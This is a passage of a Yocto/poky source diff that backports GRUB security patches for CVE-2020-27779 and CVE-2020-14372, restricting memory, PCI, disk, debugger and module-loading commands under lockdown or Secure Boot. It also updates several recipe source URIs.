ADDR.")); ++ grub_register_command_lockdown ("write_dword", grub_cmd_write, ++ N_("ADDR VALUE [MASK]"), ++ N_("Write 32-bit VALUE to ADDR.")); + } + + GRUB_MOD_FINI(memrw) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779.patch new file mode 100644 index 0000000000..c82423b8af --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779.patch @@ -0,0 +1,70 @@ +From 584263eca1546e5cab69ba6fe7b4b07df2630a21 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Wed, 14 Oct 2020 16:33:42 +0200 +Subject: [PATCH] mmap: Don't register cutmem and badram commands when lockdown + is enforced + +The cutmem and badram commands can be used to remove EFI memory regions +and potentially disable the UEFI Secure Boot. Prevent the commands to be +registered if the GRUB is locked down. + +Fixes: CVE-2020-27779 + +Reported-by: Teddy Reed <teddy.reed@gmail.com> +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d298b41f90cbf1f2e5a10e29daa1fc92ddee52c9] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + docs/grub.texi | 4 ++++ + grub-core/mmap/mmap.c | 13 +++++++------ + 2 files changed, 11 insertions(+), 6 deletions(-) + +diff --git a/docs/grub.texi b/docs/grub.texi +index 47ac7ff..a1aaee6 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -4051,6 +4051,10 @@ this page is to be filtered. This syntax makes it easy to represent patterns + that are often result of memory damage, due to physical distribution of memory + cells. + ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ This prevents removing EFI memory regions to potentially subvert the ++ security mechanisms provided by the UEFI secure boot. ++ + @node blocklist + @subsection blocklist + +diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c +index 57b4e9a..7ebf32e 100644 +--- a/grub-core/mmap/mmap.c ++++ b/grub-core/mmap/mmap.c +@@ -20,6 +20,7 @@ + #include <grub/memory.h> + #include <grub/machine/memory.h> + #include <grub/err.h> ++#include <grub/lockdown.h> + #include <grub/misc.h> + #include <grub/mm.h> + #include <grub/command.h> +@@ -534,12 +535,12 @@ static grub_command_t cmd, cmd_cut; + + GRUB_MOD_INIT(mmap) + { +- cmd = grub_register_command ("badram", grub_cmd_badram, +- N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"), +- N_("Declare memory regions as faulty (badram).")); +- cmd_cut = grub_register_command ("cutmem", grub_cmd_cutmem, +- N_("FROM[K|M|G] TO[K|M|G]"), +- N_("Remove any memory regions in specified range.")); ++ cmd = grub_register_command_lockdown ("badram", grub_cmd_badram, ++ N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"), ++ N_("Declare memory regions as faulty (badram).")); ++ cmd_cut = grub_register_command_lockdown ("cutmem", grub_cmd_cutmem, ++ N_("FROM[K|M|G] TO[K|M|G]"), ++ N_("Remove any memory regions in specified range.")); + + } + diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch new file mode 100644 index 0000000000..e33c96a05b --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch @@ -0,0 +1,105 @@ +From 4ff1dfdf8c4c71bf4b0dd0488d9fa40ff2617f41 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Wed, 24 Feb 2021 09:00:05 +0100 +Subject: [PATCH] commands: Restrict commands that can load BIOS or DT blobs + when locked down + +There are some more commands that should be restricted when the GRUB is +locked down. Following is the list of commands and reasons to restrict: + + * fakebios: creates BIOS-like structures for backward compatibility with + existing OSes. This should not be allowed when locked down. + + * loadbios: reads a BIOS dump from storage and loads it. This action + should not be allowed when locked down. + + * devicetree: loads a Device Tree blob and passes it to the OS. It replaces + any Device Tree provided by the firmware. This also should + not be allowed when locked down. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=468a5699b249fe6816b4e7e86c5dc9d325c9b09e] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + docs/grub.texi | 3 +++ + grub-core/commands/efi/loadbios.c | 16 ++++++++-------- + grub-core/loader/arm/linux.c | 6 +++--- + grub-core/loader/efi/fdt.c | 4 ++-- + 4 files changed, 16 insertions(+), 13 deletions(-) + +diff --git a/docs/grub.texi b/docs/grub.texi +index a1aaee6..ccf1908 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -4236,6 +4236,9 @@ Load a device tree blob (.dtb) from a filesystem, for later use by a Linux + kernel. Does not perform merging with any device tree supplied by firmware, + but rather replaces it completely. + @ref{GNU/Linux}. ++ ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ This is done to prevent subverting various security mechanisms. + @end deffn + + @node distrust +diff --git a/grub-core/commands/efi/loadbios.c b/grub-core/commands/efi/loadbios.c +index d41d521..5c7725f 100644 +--- a/grub-core/commands/efi/loadbios.c ++++ b/grub-core/commands/efi/loadbios.c +@@ -205,14 +205,14 @@ static grub_command_t cmd_fakebios, cmd_loadbios; + + GRUB_MOD_INIT(loadbios) + { +- cmd_fakebios = grub_register_command ("fakebios", grub_cmd_fakebios, +- 0, N_("Create BIOS-like structures for" +- " backward compatibility with" +- " existing OS.")); +- +- cmd_loadbios = grub_register_command ("loadbios", grub_cmd_loadbios, +- N_("BIOS_DUMP [INT10_DUMP]"), +- N_("Load BIOS dump.")); ++ cmd_fakebios = grub_register_command_lockdown ("fakebios", grub_cmd_fakebios, ++ 0, N_("Create BIOS-like structures for" ++ " backward compatibility with" ++ " existing OS.")); ++ ++ cmd_loadbios = grub_register_command_lockdown ("loadbios", grub_cmd_loadbios, ++ N_("BIOS_DUMP [INT10_DUMP]"), ++ N_("Load BIOS dump.")); + } + + GRUB_MOD_FINI(loadbios) +diff --git a/grub-core/loader/arm/linux.c b/grub-core/loader/arm/linux.c +index d70c174..ed23dc7 100644 +--- a/grub-core/loader/arm/linux.c ++++ b/grub-core/loader/arm/linux.c +@@ -493,9 +493,9 @@ GRUB_MOD_INIT (linux) + 0, N_("Load Linux.")); + cmd_initrd = grub_register_command ("initrd", grub_cmd_initrd, + 0, N_("Load initrd.")); +- cmd_devicetree = grub_register_command ("devicetree", grub_cmd_devicetree, +- /* TRANSLATORS: DTB stands for device tree blob. */ +- 0, N_("Load DTB file.")); ++ cmd_devicetree = grub_register_command_lockdown ("devicetree", grub_cmd_devicetree, ++ /* TRANSLATORS: DTB stands for device tree blob. */ ++ 0, N_("Load DTB file.")); + my_mod = mod; + current_fdt = (const void *) grub_arm_firmware_get_boot_data (); + machine_type = grub_arm_firmware_get_machine_type (); +diff --git a/grub-core/loader/efi/fdt.c b/grub-core/loader/efi/fdt.c +index ee9c559..003d07c 100644 +--- a/grub-core/loader/efi/fdt.c ++++ b/grub-core/loader/efi/fdt.c +@@ -165,8 +165,8 @@ static grub_command_t cmd_devicetree; + GRUB_MOD_INIT (fdt) + { + cmd_devicetree = +- grub_register_command ("devicetree", grub_cmd_devicetree, 0, +- N_("Load DTB file.")); ++ grub_register_command_lockdown ("devicetree", grub_cmd_devicetree, 0, ++ N_("Load DTB file.")); + } + + GRUB_MOD_FINI (fdt) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch new file mode 100644 index 0000000000..f9a6a73ebc --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch @@ -0,0 +1,37 @@ +From e4f5c16f76e137b3beb6b61a6d2435e54fcb495c Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Wed, 24 Feb 2021 22:59:59 +0100 +Subject: [PATCH] commands/setpci: Restrict setpci command when locked down + +This command can set PCI devices register values, which makes it dangerous +in a locked down configuration. Restrict it so can't be used on this setup. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=58b77d4069823b44c5fa916fa8ddfc9c4cd51e02] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + grub-core/commands/setpci.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/grub-core/commands/setpci.c b/grub-core/commands/setpci.c +index d5bc97d..fa2ba7d 100644 +--- a/grub-core/commands/setpci.c ++++ b/grub-core/commands/setpci.c +@@ -329,10 +329,10 @@ static grub_extcmd_t cmd; + + GRUB_MOD_INIT(setpci) + { +- cmd = grub_register_extcmd ("setpci", grub_cmd_setpci, 0, +- N_("[-s POSITION] [-d DEVICE] [-v VAR] " +- "REGISTER[=VALUE[:MASK]]"), +- N_("Manipulate PCI devices."), options); ++ cmd = grub_register_extcmd_lockdown ("setpci", grub_cmd_setpci, 0, ++ N_("[-s POSITION] [-d DEVICE] [-v VAR] " ++ "REGISTER[=VALUE[:MASK]]"), ++ N_("Manipulate PCI devices."), options); + } + + GRUB_MOD_FINI(setpci) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch new file mode 100644 index 0000000000..a756f8d1cf --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch @@ -0,0 +1,35 @@ +From 7949671de268ba3116d113778e5d770574e9f9e3 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Wed, 24 Feb 2021 12:59:29 +0100 +Subject: [PATCH] commands/hdparm: Restrict hdparm command when locked down + +The command can be used to get/set ATA disk parameters. Some of these can +be dangerous since change the disk behavior. Restrict it when locked down. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5c97492a29c6063567b65ed1a069f5e6f4e211f0] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + grub-core/commands/hdparm.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/grub-core/commands/hdparm.c b/grub-core/commands/hdparm.c +index d3fa966..2e2319e 100644 +--- a/grub-core/commands/hdparm.c ++++ b/grub-core/commands/hdparm.c +@@ -436,9 +436,9 @@ static grub_extcmd_t cmd; + + GRUB_MOD_INIT(hdparm) + { +- cmd = grub_register_extcmd ("hdparm", grub_cmd_hdparm, 0, +- N_("[OPTIONS] DISK"), +- N_("Get/set ATA disk parameters."), options); ++ cmd = grub_register_extcmd_lockdown ("hdparm", grub_cmd_hdparm, 0, ++ N_("[OPTIONS] DISK"), ++ N_("Get/set ATA disk parameters."), options); + } + + GRUB_MOD_FINI(hdparm) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch new file mode 100644 index 0000000000..b52273ff50 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch @@ -0,0 +1,62 @@ +From 6993cce7c3a9d15e6573845f455d2f0de424a717 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Wed, 24 Feb 2021 15:03:26 +0100 +Subject: [PATCH] gdb: Restrict GDB access when locked down + +The gdbstub* commands allow to start and control a GDB stub running on +local host that can be used to connect from a remote debugger. Restrict +this functionality when the GRUB is locked down. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=508270838998f151a82e9c13e7cb8a470a2dc23d] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + grub-core/gdb/gdb.c | 32 ++++++++++++++++++-------------- + 1 file changed, 18 insertions(+), 14 deletions(-) + +diff --git a/grub-core/gdb/gdb.c b/grub-core/gdb/gdb.c +index 847a1e1..1818cb6 100644 +--- a/grub-core/gdb/gdb.c ++++ b/grub-core/gdb/gdb.c +@@ -75,20 +75,24 @@ static grub_command_t cmd, cmd_stop, cmd_break; + GRUB_MOD_INIT (gdb) + { + grub_gdb_idtinit (); +- cmd = grub_register_command ("gdbstub", grub_cmd_gdbstub, +- N_("PORT"), +- /* TRANSLATORS: GDB stub is a small part of +- GDB functionality running on local host +- which allows remote debugger to +- connect to it. */ +- N_("Start GDB stub on given port")); +- cmd_break = grub_register_command ("gdbstub_break", grub_cmd_gdb_break, +- /* TRANSLATORS: this refers to triggering +- a breakpoint so that the user will land +- into GDB. */ +- 0, N_("Break into GDB")); +- cmd_stop = grub_register_command ("gdbstub_stop", grub_cmd_gdbstop, +- 0, N_("Stop GDB stub")); ++ cmd = grub_register_command_lockdown ("gdbstub", grub_cmd_gdbstub, ++ N_("PORT"), ++ /* ++ * TRANSLATORS: GDB stub is a small part of ++ * GDB functionality running on local host ++ * which allows remote debugger to ++ * connect to it. ++ */ ++ N_("Start GDB stub on given port")); ++ cmd_break = grub_register_command_lockdown ("gdbstub_break", grub_cmd_gdb_break, ++ /* ++ * TRANSLATORS: this refers to triggering ++ * a breakpoint so that the user will land ++ * into GDB. ++ */ ++ 0, N_("Break into GDB")); ++ cmd_stop = grub_register_command_lockdown ("gdbstub_stop", grub_cmd_gdbstop, ++ 0, N_("Stop GDB stub")); + } + + GRUB_MOD_FINI (gdb) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch new file mode 100644 index 0000000000..474826ade5 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch @@ -0,0 +1,61 @@ +From 73f214761cff76a18a2a867976bdd3a9adb00b67 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Wed, 24 Feb 2021 14:44:38 +0100 +Subject: [PATCH] loader/xnu: Don't allow loading extension and packages when + locked down + +The shim_lock verifier validates the XNU kernels but no its extensions +and packages. Prevent these to be loaded when the GRUB is locked down. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c5565135f12400a925ee901b25984e7af4442f5] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + grub-core/loader/xnu.c | 31 +++++++++++++++++-------------- + 1 file changed, 17 insertions(+), 14 deletions(-) + +diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c +index 77d7060..07232d2 100644 +--- a/grub-core/loader/xnu.c ++++ b/grub-core/loader/xnu.c +@@ -1482,20 +1482,23 @@ GRUB_MOD_INIT(xnu) + N_("Load XNU image.")); + cmd_kernel64 = grub_register_command ("xnu_kernel64", grub_cmd_xnu_kernel64, + 0, N_("Load 64-bit XNU image.")); +- cmd_mkext = grub_register_command ("xnu_mkext", grub_cmd_xnu_mkext, 0, +- N_("Load XNU extension package.")); +- cmd_kext = grub_register_command ("xnu_kext", grub_cmd_xnu_kext, 0, +- N_("Load XNU extension.")); +- cmd_kextdir = grub_register_command ("xnu_kextdir", grub_cmd_xnu_kextdir, +- /* TRANSLATORS: OSBundleRequired is a +- variable name in xnu extensions +- manifests. It behaves mostly like +- GNU/Linux runlevels. +- */ +- N_("DIRECTORY [OSBundleRequired]"), +- /* TRANSLATORS: There are many extensions +- in extension directory. */ +- N_("Load XNU extension directory.")); ++ cmd_mkext = grub_register_command_lockdown ("xnu_mkext", grub_cmd_xnu_mkext, 0, ++ N_("Load XNU extension package.")); ++ cmd_kext = grub_register_command_lockdown ("xnu_kext", grub_cmd_xnu_kext, 0, ++ N_("Load XNU extension.")); ++ cmd_kextdir = grub_register_command_lockdown ("xnu_kextdir", grub_cmd_xnu_kextdir, ++ /* ++ * TRANSLATORS: OSBundleRequired is ++ * a variable name in xnu extensions ++ * manifests. It behaves mostly like ++ * GNU/Linux runlevels. ++ */ ++ N_("DIRECTORY [OSBundleRequired]"), ++ /* ++ * TRANSLATORS: There are many extensions ++ * in extension directory. ++ */ ++ N_("Load XNU extension directory.")); + cmd_ramdisk = grub_register_command ("xnu_ramdisk", grub_cmd_xnu_ramdisk, 0, + /* TRANSLATORS: ramdisk here isn't identifier. It can be translated. */ + N_("Load XNU ramdisk. " diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch new file mode 100644 index 0000000000..e5d372a2b1 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch @@ -0,0 +1,65 @@ +From dcc5a434e59f721b03cc809db0375a24aa2ac6d0 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Sat, 7 Nov 2020 01:03:18 +0100 +Subject: [PATCH] docs: Document the cutmem command + +The command is not present in the docs/grub.texi user documentation. + +Reported-by: Daniel Kiper <daniel.kiper@oracle.com> +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com> +Reviewed-by: Javier Martinez Canillas <javierm@redhat.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=f05e79a0143beb2d9a482a3ebf4fe0ce76778122] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + docs/grub.texi | 21 +++++++++++++++++++++ + 1 file changed, 21 insertions(+) + +diff --git a/docs/grub.texi b/docs/grub.texi +index ccf1908..ae85f55 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -3892,6 +3892,7 @@ you forget a command, you can run the command @command{help} + * cpuid:: Check for CPU features + * crc:: Compute or check CRC32 checksums + * cryptomount:: Mount a crypto device ++* cutmem:: Remove memory regions + * date:: Display or set current date and time + * devicetree:: Load a device tree blob + * distrust:: Remove a pubkey from trusted keys +@@ -4051,6 +4052,8 @@ this page is to be filtered. This syntax makes it easy to represent patterns + that are often result of memory damage, due to physical distribution of memory + cells. + ++The command is similar to @command{cutmem} command. ++ + Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). + This prevents removing EFI memory regions to potentially subvert the + security mechanisms provided by the UEFI secure boot. +@@ -4214,6 +4217,24 @@ GRUB suports devices encrypted using LUKS and geli. Note that necessary modules + be used. + @end deffn + ++@node cutmem ++@subsection cutmem ++ ++@deffn Command cutmem from[K|M|G] to[K|M|G] ++Remove any memory regions in specified range. ++@end deffn ++ ++This command notifies the memory manager that specified regions of RAM ought to ++be filtered out. This remains in effect after a payload kernel has been loaded ++by GRUB, as long as the loaded kernel obtains its memory map from GRUB. Kernels ++that support this include Linux, GNU Mach, the kernel of FreeBSD and Multiboot ++kernels in general. ++ ++The command is similar to @command{badram} command. ++ ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ This prevents removing EFI memory regions to potentially subvert the ++ security mechanisms provided by the UEFI secure boot. + + @node date + @subsection date diff --git a/poky/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch b/poky/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch new file mode 100644 index 0000000000..504352b4e3 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch @@ -0,0 +1,107 @@ +From b5a6aa7d77439bfeb75f200abffe15c6f685c907 Mon Sep 17 00:00:00 2001 +From: Matthew Garrett <mjg@redhat.com> +Date: Mon, 13 Jan 2014 12:13:09 +0000 +Subject: Don't permit loading modules on UEFI secure boot + +Author: Colin Watson <cjwatson@ubuntu.com> +Origin: vendor, http://pkgs.fedoraproject.org/cgit/grub2.git/tree/grub-2.00-no-insmod-on-sb.patch +Forwarded: no +Last-Update: 2013-12-25 + +Patch-Name: no-insmod-on-sb.patch + +Upstream-Status: Inappropriate [other, https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch] + +Backport of a Debian (and Fedora) patch implementing a way to get secure boot status +for CVE-2020-14372_4.patch. The upstream solution has too many dependencies to backport. +Source: https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch + +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + grub-core/kern/dl.c | 13 +++++++++++++ + grub-core/kern/efi/efi.c | 28 ++++++++++++++++++++++++++++ + include/grub/efi/efi.h | 1 + + 3 files changed, 42 insertions(+) + +diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c +index 48eb5e7b6..074dfc3c6 100644 +--- a/grub-core/kern/dl.c ++++ b/grub-core/kern/dl.c +@@ -38,6 +38,10 @@ + #define GRUB_MODULES_MACHINE_READONLY + #endif + ++#ifdef GRUB_MACHINE_EFI ++#include <grub/efi/efi.h> ++#endif ++ + + + #pragma GCC diagnostic ignored "-Wcast-align" +@@ -686,6 +690,15 @@ grub_dl_load_file (const char *filename) + void *core = 0; + grub_dl_t mod = 0; + ++#ifdef GRUB_MACHINE_EFI ++ if (grub_efi_secure_boot ()) ++ { ++ grub_error (GRUB_ERR_ACCESS_DENIED, ++ "Secure Boot forbids loading module from %s", filename); ++ return 0; ++ } ++#endif ++ + grub_boot_time ("Loading module %s", filename); + + file = grub_file_open (filename, GRUB_FILE_TYPE_GRUB_MODULE); +diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c +index 6e1ceb905..96204e39b 100644 +--- a/grub-core/kern/efi/efi.c ++++ b/grub-core/kern/efi/efi.c +@@ -273,6 +273,34 @@ grub_efi_get_variable (const char *var, const grub_efi_guid_t *guid, + return NULL; + } + ++grub_efi_boolean_t ++grub_efi_secure_boot (void) ++{ ++ grub_efi_guid_t efi_var_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID; ++ grub_size_t datasize; ++ char *secure_boot = NULL; ++ char *setup_mode = NULL; ++ grub_efi_boolean_t ret = 0; ++ ++ secure_boot = grub_efi_get_variable ("SecureBoot", &efi_var_guid, &datasize); ++ ++ if (datasize != 1 || !secure_boot) ++ goto out; ++ ++ setup_mode = grub_efi_get_variable ("SetupMode", &efi_var_guid, &datasize); ++ ++ if (datasize != 1 || !setup_mode) ++ goto out; ++ ++ if (*secure_boot && !*setup_mode) ++ ret = 1; ++ ++ out: ++ grub_free (secure_boot); ++ grub_free (setup_mode); ++ return ret; ++} ++ + #pragma GCC diagnostic ignored "-Wcast-align" + + /* Search the mods section from the PE32/PE32+ image. This code uses +diff --git a/include/grub/efi/efi.h b/include/grub/efi/efi.h +index e90e00dc4..a237952b3 100644 +--- a/include/grub/efi/efi.h ++++ b/include/grub/efi/efi.h +@@ -82,6 +82,7 @@ EXPORT_FUNC (grub_efi_set_variable) (const char *var, + const grub_efi_guid_t *guid, + void *data, + grub_size_t datasize); ++grub_efi_boolean_t EXPORT_FUNC (grub_efi_secure_boot) (void); + int + EXPORT_FUNC (grub_efi_compare_device_paths) (const grub_efi_device_path_t *dp1, + const grub_efi_device_path_t *dp2); diff --git a/poky/meta/recipes-bsp/grub/grub2.inc b/poky/meta/recipes-bsp/grub/grub2.inc index 180e3752f8..db7c23a84a 100644 --- a/poky/meta/recipes-bsp/grub/grub2.inc +++ b/poky/meta/recipes-bsp/grub/grub2.inc @@ -31,6 +31,20 @@ SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \ file://CVE-2020-15706-script-Avoid-a-use-after-free-when-redefining-a-func.patch \ file://CVE-2020-15707-linux-Fix-integer-overflows-in-initrd-size-handling.patch \ file://determinism.patch \ + file://no-insmod-on-sb.patch \ + file://CVE-2020-14372_1.patch \ + file://CVE-2020-14372_2.patch \ + file://CVE-2020-14372_3.patch \ + file://CVE-2020-14372_4.patch \ + file://CVE-2020-14372_5.patch \ + file://CVE-2020-14372.patch \ + file://CVE-2020-27779.patch \ + file://CVE-2020-27779_2.patch \ + file://CVE-2020-27779_3.patch \ + file://CVE-2020-27779_4.patch \ + file://CVE-2020-27779_5.patch \ + file://CVE-2020-27779_6.patch \ + file://CVE-2020-27779_7.patch \ " SRC_URI[md5sum] = "5ce674ca6b2612d8939b9e6abed32934" SRC_URI[sha256sum] = "f10c85ae3e204dbaec39ae22fa3c5e99f0665417e91c2cb49b7e5031658ba6ea" diff --git a/poky/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch b/poky/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch new file mode 100644 index 0000000000..47c7ec4170 --- /dev/null +++ b/poky/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch @@ -0,0 +1,36 @@ +From ecdcf0df6c28c65ca6d1e5638726e13e373c76c5 Mon Sep 17 00:00:00 2001 +From: Khem Raj <raj.khem@gmail.com> +Date: Wed, 11 Nov 2020 22:58:55 -0800 +Subject: [PATCH] Fix cross compilation using autoconf detected AR + +currently its using 'ar' program from build host, which is not expected, +we need to respect AR passed in environment + +Upstream-Status: Pending + +Signed-off-by: Khem Raj <raj.khem@gmail.com> +--- + configure.in | 7 +++++++ + 1 file changed, 7 insertions(+) + +diff --git a/configure.in b/configure.in +index 4ddbe8b..b7c3c31 100644 +--- a/configure.in ++++ b/configure.in +@@ -84,6 +84,13 @@ AC_ARG_ENABLE(syslog, + ]) + + dnl Checks for programs. ++m4_ifndef([AC_PROG_AR],[dnl ++ AN_MAKEVAR([AR], [AC_PROG_AR]) ++ AN_PROGRAM([ar], [AC_PROG_AR]) ++ AC_DEFUN([AC_PROG_AR], ++ [AC_CHECK_TOOL(AR, ar, :)]) ++]) ++AC_PROG_AR + AC_PROG_CC + AC_PROG_GCC_TRADITIONAL + dnl AC_PROG_INSTALL included in AM_INIT_AUTOMAKE +-- +2.29.2 + diff --git a/poky/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb b/poky/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb index 4129237c59..54c431eeb3 100644 --- a/poky/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb +++ b/poky/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb @@ -19,6 +19,7 @@ SRC_URI = "http://www.ohse.de/uwe/releases/lrzsz-${PV}.tar.gz \ file://lrzsz-check-locale.h.patch \ file://cve-2018-10195.patch \ file://include.patch \ + file://0001-Fix-cross-compilation-using-autoconf-detected-AR.patch \ " SRC_URI[md5sum] = "b5ce6a74abc9b9eb2af94dffdfd372a4" diff --git a/poky/meta/recipes-bsp/opensbi/opensbi_0.6.bb b/poky/meta/recipes-bsp/opensbi/opensbi_0.6.bb index d8910c0ff1..972d8de17d 100644 --- a/poky/meta/recipes-bsp/opensbi/opensbi_0.6.bb +++ b/poky/meta/recipes-bsp/opensbi/opensbi_0.6.bb @@ -9,7 +9,7 @@ require opensbi-payloads.inc inherit autotools-brokensep deploy SRCREV = "ac5e821d50be631f26274765a59bc1b444ffd862" -SRC_URI = "git://github.com/riscv/opensbi.git \ +SRC_URI = "git://github.com/riscv/opensbi.git;branch=master;protocol=https \ file://0001-Makefile-Don-t-specify-mabi-or-march.patch \ " diff --git a/poky/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb b/poky/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb index 613e3161fb..8234b86162 100644 --- a/poky/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb +++ b/poky/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb @@ -10,7 +10,7 @@ LICENSE = "LGPL-2.1" LIC_FILES_CHKSUM = "file://Licenses/lgpl-2.1.txt;md5=4fbd65380cdd255951079008b364516c" SECTION = "libs" -SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https" +SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https;branch=master" SRCREV = "824551ac77bab1d0f7ae34d7a7c77b155240e754" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-bsp/u-boot/u-boot-common.inc b/poky/meta/recipes-bsp/u-boot/u-boot-common.inc index 198ed52c7c..a001190292 100644 --- a/poky/meta/recipes-bsp/u-boot/u-boot-common.inc +++ b/poky/meta/recipes-bsp/u-boot/u-boot-common.inc @@ -14,7 +14,7 @@ PE = "1" # repo during parse SRCREV = "303f8fed261020c1cb7da32dad63b610bf6873dd" -SRC_URI = "git://git.denx.de/u-boot.git \ +SRC_URI = "git://git.denx.de/u-boot.git;branch=master \ file://remove-redundant-yyloc-global.patch \ file://CVE-2020-8432.patch \ file://CVE-2020-10648-1.patch \ diff --git a/poky/meta/recipes-connectivity/bind/bind_9.11.32.bb b/poky/meta/recipes-connectivity/bind/bind_9.11.35.bb index 9feebe5ae2..4652529623 100644 --- a/poky/meta/recipes-connectivity/bind/bind_9.11.32.bb +++ b/poky/meta/recipes-connectivity/bind/bind_9.11.35.bb @@ -21,7 +21,7 @@ SRC_URI = 